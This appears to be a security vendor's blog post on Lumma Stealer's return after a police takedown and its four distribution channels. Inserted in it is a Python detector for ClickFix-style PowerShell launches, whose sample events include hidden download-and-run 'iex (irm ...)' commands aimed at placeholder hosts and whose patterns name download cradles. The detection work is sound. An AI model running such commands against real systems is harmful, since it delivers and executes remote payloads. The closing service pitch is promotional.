
Lumma Stealer Returns After Being Disrupted by Authorities in May

Written by Adriana Aguilar | Jul 24, 2025 8:05:23 PM

After a major police operation in May that led to the seizure of around 2,300 domains and part of its infrastructure, Lumma Stealer, one of the most active malware strains on the market, is slowly resuming its operations.

Although its malware-as-a-service (MaaS) platform took a hard hit, it wasn’t completely dismantled. By early June, new signs of activity from this info-stealer were already being detected, making it clear that the operators were still active.

On cybercrime forums like XSS, the Lumma operators reacted quickly, confirming that their main server had not been seized (although it was remotely wiped), and that they were actively working to restore the service.

First message from the Lumma administrator after the police action (Source: Trend Micro)


Lumma Stealer Recovers and Returns to Stealing Data as Before


Despite the initial blow from authorities, the operation behind Lumma Stealer managed to reorganize surprisingly quickly. Its Malware-as-a-Service (MaaS) model gradually resumed, once again gaining the trust of the cybercriminal community and reactivating its data theft activities across multiple platforms.

According to experts from Trend Micro, Lumma has almost fully regained the level of activity it had before the police operation. Their report highlights a swift reconstruction of the infrastructure, supported by real-time telemetry data.

“Following the police action against Lumma Stealer and its associated infrastructure, our team has observed clear signs of a resurgence in its operations,” the report states.

They also add that the malware network began showing intense activity just weeks after the takedown, suggesting that the operators had well-established contingency plans.


New Lumma C2 Domains




Lumma Adapts and Uses New Tactics to Evade Detection and Spread


Lumma hasn’t just resumed operations—it has returned with improved capabilities to hide itself and continue infecting devices. One of the malware’s most effective tactics remains leveraging legitimate cloud services to disguise its malicious traffic.

However, instead of continuing to use Cloudflare, it has now switched to alternative providers, primarily Selectel, a company based in Russia. The goal of this shift is clear: to avoid the takedowns and infrastructure disruption that come with relying on more closely monitored services.

Additionally, Lumma has once again adopted a multifaceted distribution approach, using multiple channels to achieve new infections. In total, four active methods have been identified for spreading the malware:


1. Fake Cracks and Keygens


One of the oldest but still effective methods. Fake software cracks and license key generators (keygens) are promoted via malicious ads and manipulated search results. Victims are led to deceptive sites where their systems are scanned using traffic detection systems (TDS) to confirm they are real targets. Then, they are served the malicious file that initiates the infection: the Lumma Downloader.


2. ClickFix Sites with Fake CAPTCHAs


In this technique, compromised websites display fake CAPTCHA verification pages. The trick is that when users attempt to complete the verification, PowerShell commands are executed in the background. This allows Lumma to load directly into system memory, helping it evade many security solutions that only scan suspicious files stored on disk.
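Because the ClickFix chain never writes a file before the loader runs, the most reliable place to catch it is process-creation telemetry rather than disk scanning. The following Python is an added example for this article, not code from the original post or from Trend Micro: it scores constructed, simplified process-creation events (a key="value" line format loosely modelled on Sysmon Event ID 1 fields) for the traits the technique relies on: PowerShell launched from the interactive shell (explorer.exe, as happens when a victim pastes a command into the Run dialog), a hidden window, an encoded or download-and-run command, and execution straight from memory. The weights, the alert threshold, the field names and the sample events are all assumptions made for the example.

```python
"""Heuristic detection of ClickFix-style PowerShell launches.

Added example (not the article's or Trend Micro's code).  Log format,
weights, threshold and sample events are assumptions for illustration.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field
from typing import Optional

# key="value" pairs; values contain no double quotes in this constructed format.
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
# Base64 blob after -e/-ec/-enc/-EncodedCommand (PowerShell encodes it as UTF-16LE).
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# (pattern, weight, label); applied to the raw command line and, if present,
# to the decoded -EncodedCommand payload.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3, "in-memory execution"),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
     2, "download cradle"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), 1, "profile bypass"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
]
POWERSHELL = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog / pasted-command launches
THRESHOLD = 5                            # assumed alert threshold


@dataclass
class Finding:
    line_no: int
    score: int = 0
    reasons: list[str] = field(default_factory=list)


def parse_event(line: str) -> dict[str, str]:
    """Turn one constructed log line into a lower-cased field dict."""
    return {k.lower(): v for k, v in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(line_no: int, ev: dict[str, str]) -> Optional[Finding]:
    """Score one event; None if it is not a PowerShell process creation."""
    if basename(ev.get("image", "")) not in POWERSHELL:
        return None
    finding = Finding(line_no)
    parent = basename(ev.get("parentimage", ""))
    if parent in INTERACTIVE_PARENTS:
        finding.score += 2
        finding.reasons.append(f"launched from {parent}")
    cmd = ev.get("cmdline", "")
    texts = [cmd]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        finding.score += 3
        finding.reasons.append("encoded command")
        texts.append(decoded)  # score what the encoding was hiding, too
    for text in texts:
        for pattern, weight, label in INDICATORS:
            if pattern.search(text) and label not in finding.reasons:
                finding.score += weight
                finding.reasons.append(label)
    return finding


def scan(lines: list[str]) -> list[Finding]:
    """Return findings at or above THRESHOLD, in log order."""
    findings = []
    for n, line in enumerate(lines, 1):
        f = score_event(n, parse_event(line))
        if f is not None and f.score >= THRESHOLD:
            findings.append(f)
    return findings


# Constructed sample events (not real telemetry).  The encoded payload is built
# here so the decoder is exercised without hand-typing base64.
_ENC = base64.b64encode("iex (irm https://example.invalid/p)".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    rf'ts="2025-07-24T10:01:02Z" image="{PS}" parentimage="C:\Windows\explorer.exe" cmdline="powershell.exe -w hidden -nop -c iex (irm https://captcha-check.example.invalid/verify)"',
    rf'ts="2025-07-24T10:05:00Z" image="{PS}" parentimage="C:\Program Files\Acme\agent.exe" cmdline="powershell.exe -File C:\Scripts\inventory.ps1"',
    r'ts="2025-07-24T10:06:30Z" image="C:\Windows\System32\notepad.exe" parentimage="C:\Windows\explorer.exe" cmdline="notepad.exe notes.txt"',
    rf'ts="2025-07-24T10:09:12Z" image="{PS}" parentimage="C:\Windows\explorer.exe" cmdline="powershell -ep bypass -enc {_ENC}"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: score {f.score} ({', '.join(f.reasons)})")
```

Run as a script it reports the first and fourth sample events and stays quiet on the scheduled script launched by an agent, which is the point of combining the parent-process check with command-line traits instead of alerting on every PowerShell start. Decoding `-EncodedCommand` before scoring matters: the fourth event looks bland on the surface and only reveals the download-and-execute pattern once the payload is decoded.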


3. Fake GitHub Repositories


Attackers are creating GitHub repositories with AI-generated content, designed to attract gamers or curious users with supposed tools, mods, or game hacks. Hidden within these repositories are Lumma payloads—malicious executables in disguise (e.g., named “TempSpoofer.exe”), either directly or packed into ZIP files.


4. YouTube Videos and Facebook Posts


Lastly, Lumma is also being promoted via YouTube videos and Facebook posts that offer free or cracked software. These lead users to external sites where the malware is downloaded. In some cases, legitimate platforms like sites.google.com are abused, giving victims a false sense of safety and credibility.


Malicious GitHub Repository (Left) and YouTube Video (Right) Distributing Lumma Payloads


The Reality Behind Lumma’s Return: Do Police Actions Really Work?


The return of Lumma Stealer as an active threat highlights a harsh reality: police operations, unless accompanied by arrests or formal charges, are not enough to stop the most persistent cybercriminals.

For the operators behind these Malware-as-a-Service (MaaS) platforms, law enforcement actions are seen more as a temporary setback than a real threat. As long as there are no concrete legal consequences, these actors simply pause, reorganize, and jump back into the game.

The reason is simple: these operations are incredibly lucrative. With thousands of clients renting the malware, the revenue can be extremely high. For those behind it, the risk seems small compared to the profits, and they know how to move quickly to stay one step ahead of the authorities.


How Should Companies Prepare for Threats Like Lumma?


Today, a traditional antivirus is no longer enough. Companies need advanced cybersecurity solutions that detect anomalous behavior, analyze traffic in real time, and can respond automatically to potential threats.

At TecnetOne, we understand that effective prevention requires visibility, context, and action. That’s why we offer a comprehensive SOC as a Service solution that combines best-in-class technologies: we use an XDR platform for deeper detection and event correlation, a SIEM system that centralizes and analyzes logs across your infrastructure, and Active Response to react automatically to real-time threats.

Our team of analysts monitors your environment 24/7, supported by threat intelligence, advanced automation, and well-defined response processes. This way, we not only detect and block attacks like Lumma but also help you reduce operational risk, protect your data, and maintain business continuity.